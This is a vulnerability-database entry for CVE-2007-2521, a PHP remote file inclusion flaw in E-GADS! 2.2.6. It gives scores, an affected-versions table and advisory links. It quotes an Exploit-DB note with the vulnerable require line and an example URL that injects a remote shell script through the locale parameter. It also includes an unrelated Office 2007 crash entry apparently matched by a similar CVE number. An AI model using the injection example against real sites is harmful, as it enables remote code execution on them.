CVE-2007-2521
Published 2007-05-08
Priority P3 · 44 · high · 7.5 CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.34% (87.1th percentile)
PHP remote file inclusion vulnerability in common.php in E-GADS! before 2.2.7 allows remote attackers to execute arbitrary PHP code via a URL in the locale parameter.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| e-gads | e-gads | <= 2.2.6 | — |
| e-gads | e-gads | — | — |
| e-gads | e-gads | — | — |
| e-gads | e-gads | — | — |
| e-gads | e-gads | — | — |
| e-gads | e-gads | — | — |
No detection rules found.
Exploit-DB
Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
exploitdb·2015-09-16
CVE-2015-2521 Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=465
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1516065514_orig.xls
Crashing File: 1516065514_crash.xls
Minimized Crashing File: 1516065514_min.xls
The minimized crashing file shows a one-bit delta from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
When run without Applicati
Exploit-DB
E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion
exploitdb·2007-05-04
CVE-2007-2521 E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion
---
##############################################################################################
##############################################################################################
#E-GADS! 2.2.6 Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:common.php
#
# require ("$locale/locale.php");
#
#BUG:
#
#Example:http://site.com/path/common.php?locale=[[Sh3LL Script]]
#
#Script Download
#############################################################################
#https://sourceforge.net/project/showfiles.php?group_id=88942&package_id=93125&release_id=444821
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
###
No writeups or analysis indexed.
http://osvdb.org/35773
http://secunia.com/advisories/25104
http://www.securityfocus.com/bid/23817
http://www.vupen.com/english/advisories/2007/1665
https://exchange.xforce.ibmcloud.com/vulnerabilities/34073
https://sourceforge.net/project/shownotes.php?group_id=88942&release_id=533122
https://www.exploit-db.com/exploits/3846
Published: 2007-05-08